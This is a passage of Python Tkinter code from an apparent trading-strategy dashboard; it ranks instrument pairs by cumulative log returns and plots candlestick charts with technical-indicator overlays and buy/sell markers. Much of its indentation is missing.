label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
            subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
            fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(55):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(66):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
        #-- all of the strategy ids below share the same ranking logic: cumulative
        #-- log returns are computed per pair and the top five pairs are displayed,
        #-- so a single branch handles every id in the list
        elif grabstrategy in ('77', '88', '99', '111', '222', '333', '444', '555',
                              '666', '777', '888', '999', '1111', '2222', '3333',
                              '4444', '5555', '6666', '7777', '8888', '9999',
                              '11111', '22222', '33333', '44444', '55555'):
            returns = pd.DataFrame()
            maximum = {}
            highestReturns = []
            for stockPair in pairs:
                #-- load the predicted signals for this pair and accumulate its log returns
                data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}" + '.csv'))
                data['timestamp'] = pd.to_datetime(data['timestamp'])
                data = data[data.Position != 'EXIT']
                data['signal'] = np.where(data.Position == 'BUY', 1, 0)
                data['return'] = np.log(data.Close / data.Close.shift(1))
                data['return'] = data['return'] * data.signal.shift(1)
                returns[stockPair] = np.cumsum(data['return'])
            #-- rank pairs by mean cumulative return and keep the best five
            for ii in returns.columns:
                maximum[ii] = np.mean(returns[ii])
            maximum = Counter(maximum)
            for tradethis in maximum.most_common(5):
                highestReturns.append(tradethis[0])
            label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
            for enum, ii in enumerate(highestReturns):
                returnCommons = tk.Button(Framesort, bg = '#42f55a')
                returnCommons.configure(text = f'{enum+1}. {ii}')
                returnCommons.grid(row = 3, column = enum+3)
            Framesort.grid(row = 2, column = 0)
            fig = Figure(figsize=self.figsize)
            subplots = fig.add_subplot(111)
            for ii in returns.columns:
                subplots.plot(np.arange(len(returns)), returns[ii], label = ii)
            subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
            fig.set_tight_layout(True)
            canvas = FigureCanvasTkAgg(fig, returnplot)
            canvas.draw()
            canvas.get_tk_widget().pack(side = tk.BOTTOM, fill = tk.BOTH, expand = True)
            toolbar = NavigationToolbar2Tk(canvas, returnplot)
            toolbar.update()
            canvas.get_tk_widget().pack(side = tk.BOTTOM, fill = tk.BOTH, expand = True)
else:
return None
returnplot.grid(row = 1, column = 0)
#--signal visualization
class visu(ttk.Frame):
def __init__(self, master, path):
ttk.Frame.__init__(self, master)
self.path = path
self.figsize = (12, 7)
optionFrame = ttk.Frame(self)
style = ttk.Style()
name = tk.Label(optionFrame, text = 'Pairs')
name.grid(row = 1, column = 0)
style.map('TCombobox', fieldbackground=[('readonly','#e3104f')])
style.map('TCombobox', selectbackground=[('readonly', '#e3104f')])
style.map('TCombobox', selectforeground=[('readonly', 'white')])
self.pairs = ttk.Combobox(optionFrame, values = self.path['instruments'].split(','), state = 'readonly')
self.pairs.current(2)
self.pairs.focus()
self.pairs.grid(row = 1, column = 1, padx = 20, pady = 10)
self.pairs.bind("<<ComboboxSelected>>", self.callback)
strategy = tk.Label(optionFrame, text = 'Strategy').grid(row = 1, column = 2)
self.strategyOption = ttk.Combobox(optionFrame, values = self.path['strategy'], state = 'readonly')
self.strategyOption.current(32)
self.strategyOption.focus()
self.strategyOption.bind("<<ComboboxSelected>>", self.callback)
self.strategyOption.grid(row = 1, column = 3, padx = 20, pady = 10)
#timeframe frame
        timeframe = tk.Label(optionFrame, text = 'Timeframe').grid(row = 1, column = 4)
self.timeOption = ttk.Combobox(optionFrame, values = self.path['timeframes'], state = 'readonly')
self.timeOption.current(2)
self.timeOption.focus()
self.timeOption.bind("<<ComboboxSelected>>", self.callback)
self.timeOption.grid(row = 1, column = 5, padx = 20, pady = 10)
        #-- use a local name so the widget's own update() method is not overwritten
        updateButton = tk.Button(optionFrame, text = 'Update', bg = '#a1a09f', command = self.plots).grid(row = 1, column = 6)
#option frame
optionFrame.grid(row = 0, column = 0)
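        #-- render the default pair/strategy/timeframe selection once so the frame
        #-- is populated before the user presses Update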
self.plots()
def callback(self, eventObject):
return eventObject.widget.get()
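    # For strategies that combine several indicators, the Position column is re-encoded
    # into numeric plot markers: 1 when the position flips to BUY, -1 when it flips to
    # SELL, and 2 for any other change (e.g. EXIT); it stays 0 while the position is held.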
def multiIndicatorSignal(self, df):
positions = np.array(df.Position)
signal = np.zeros_like(positions)
initialPosition = positions[0]
for ii, pos in enumerate(positions):
if pos == initialPosition:
pass
else:
initialPosition = pos
if initialPosition == 'BUY':
signal[ii] = 1
elif initialPosition == 'SELL':
signal[ii] = -1
else:
signal[ii] = 2
df['viewSignal'] = list(signal)
return df
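    # plots() loads the predicted CSV for the selected pair/strategy/timeframe and draws
    # a candlestick chart with the indicator overlays and buy/sell markers that match the
    # chosen strategy id, embedding the figure in the Tk frame together with a toolbar.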
def plots(self):
frameplot = ttk.Frame(self)
grabpair = str(self.pairs.get())
grabstrategy = str(self.strategyOption.get())
grabtimeframe = str(self.timeOption.get())
        data = pd.read_csv(os.path.join(self.path['mainPath'], f"{self.path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{grabpair}" + '.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
        data.dropna(inplace = True)
        data.reset_index(drop = True, inplace = True)  #-- keep index-based marker positions aligned with the 0..N-1 candle range
candlewidth = 1
markersize = 7
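        #-- single-indicator strategies difference the stored signal column so that
        #-- +1 marks a fresh BUY (plotted '^') and -1 marks the opposite flip (plotted 'v')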
#--MA plot
if grabstrategy == str(1):
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
            #-- prefer exponential moving-average columns and fall back to simple MAs
            columns = [x for x in data.columns if x[:3] == 'EMA']
            if not columns:
                columns = [x for x in data.columns if x[:3] == 'SMA']
data['viewSignal'] = data.signal.diff()
candlestick2_ohlc(subplots, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
            subplots.plot(np.arange(len(data)), data[columns[0]], label = columns[0])
            subplots.plot(np.arange(len(data)), data[columns[1]], label = columns[1])
subplots.plot(data.loc[data.viewSignal == -1.0].index, data[columns[0]][data.viewSignal == -1], 'v', color = 'r', markersize = markersize)
subplots.plot(data.loc[data.viewSignal == 1.0].index, data[columns[1]][data.viewSignal == 1], '^', color = 'g', markersize = markersize)
subplots.legend(bbox_to_anchor=(0, 1.02, 1, .102), loc=3, ncol=5, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--Bollinger plot
elif grabstrategy == str(2):
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
data['viewSignal'] = data.signal.diff()
candlestick2_ohlc(subplots, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
            subplots.plot(np.arange(len(data)), data.bollinger_band, lw = 1., label = 'bollinger_band')
            subplots.plot(np.arange(len(data)), data.Upper_band, lw = 1., label = 'Upper_band')
            subplots.plot(np.arange(len(data)), data.Lower_band, lw = 1., label = 'Lower_band')
subplots.plot(data.loc[data.viewSignal == -1.0].index, data[['bollinger_band']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
subplots.plot(data.loc[data.viewSignal == 1.0].index, data[['bollinger_band']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
subplots.legend(bbox_to_anchor=(0, 1.02, 1, .102), loc=3, ncol=5, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--MACD plot
elif grabstrategy == str(3):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data['viewSignal'] = data.signal.diff()
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
            ax2.plot(np.arange(len(data)), data.MACD, lw = 1.)
            ax2.plot(np.arange(len(data)), data.MACD_HIST, lw = 1.)
            ax2.plot(np.arange(len(data)), data.MACD_SIGNAL, lw = 1.)
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--RSI plot
elif grabstrategy == str(4):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data['viewSignal'] = data.signal.diff()
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
            ax2.plot(np.arange(len(data)), data.RSI, lw = 1., label = 'RSI')
            ax2.fill_between(data.index, y1=30, y2=70, color='#7eebed', alpha=0.3)
            ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--SUper Trend plot
elif grabstrategy == str(5):
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
data['viewSignal'] = data.signal.diff()
candlestick2_ohlc(subplots, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
            subplots.plot(np.arange(len(data)), data.SuperTrend, lw = 1.)
subplots.plot(data.loc[data.viewSignal == -1.0].index, data[['SuperTrend']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
subplots.plot(data.loc[data.viewSignal == 1.0].index, data[['SuperTrend']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--MA vs SUPER_TREND--
elif grabstrategy == str(6):
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(subplots, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
subplots.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
subplots.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
subplots.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#-- MA vs MACD ----
elif grabstrategy == str(7):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
            ax2.plot(np.arange(len(data)), data.MACD, lw = 1.)
            ax2.plot(np.arange(len(data)), data.MACD_HIST, lw = 1.)
            ax2.plot(np.arange(len(data)), data.MACD_SIGNAL, lw = 1.)
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--MA vs RSI--
elif grabstrategy == str(8):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
            ax2.plot(np.arange(len(data)), data.RSI, lw = 1., label = 'RSI')
            ax2.fill_between(data.index, y1=30, y2=70, color='#7eebed', alpha=0.3)
            ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--- MA vs BOLLINGER BAND ---
elif grabstrategy == str(9):
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(subplots, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
subplots.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
subplots.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
subplots.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#-- BOLLINGER BAND vs MACD
elif grabstrategy == str(11):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
            ax2.plot(np.arange(len(data)), data.MACD, lw = 1.)
            ax2.plot(np.arange(len(data)), data.MACD_HIST, lw = 1.)
            ax2.plot(np.arange(len(data)), data.MACD_SIGNAL, lw = 1.)
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--BOLLINGER BAND vs RSI--
elif grabstrategy == str(22):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
            ax2.plot(np.arange(len(data)), data.RSI, lw = 1., label = 'RSI')
            ax2.fill_between(data.index, y1=30, y2=70, color='#7eebed', alpha=0.3)
            ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--BOLLINGER vs SUPERTREND --
elif grabstrategy == str(33):
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(subplots, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
subplots.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
subplots.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
subplots.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
fig.set_tight_layout(True)
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--RSI vs SUPER TREND --
elif grabstrategy == str(44):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
            ax2.plot(np.arange(len(data)), data.RSI, lw = 1., label = 'RSI')
            ax2.fill_between(data.index, y1=30, y2=70, color='#7eebed', alpha=0.3)
            ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--MOVING AVERAGE vs BOLLINGER BAND vs MACD --
elif grabstrategy == str(55):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.MACD, lw = 1.)
ax2.plot(np.arange(len(data)), data.MACD_HIST, lw = 1.)
ax2.plot(np.arange(len(data)), data.MACD_SIGNAL, lw = 1.)
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--MOVING AVERAGE vs BOLLINGER BAND vs RSI --
elif grabstrategy == str(66):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.RSI, lw = 1., label = 'RSI')
ax2.fill_between(data.index, y1=30, y2=70, color='#7eebed', alpha=0.3)
ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--MOVING AVERAGE vs BOLLINGER BAND vs SUPER TREND --
elif grabstrategy == str(77):
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(subplots, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
subplots.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
subplots.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
subplots.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#-------------------------------------------------
#--MOVING AVERAGE vs RSI vs MACD --
elif grabstrategy == str(88):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2, ax3 = fig.subplots(3, 1, sharex = True, gridspec_kw={'height_ratios': [1, 3, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
ax1.plot(np.arange(len(data)), data.MACD, lw = 1.)
ax1.plot(np.arange(len(data)), data.MACD_HIST, lw = 1.)
ax1.plot(np.arange(len(data)), data.MACD_SIGNAL, lw = 1.)
ax1.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax1.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
candlestick2_ohlc(ax2, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax2.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax2.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
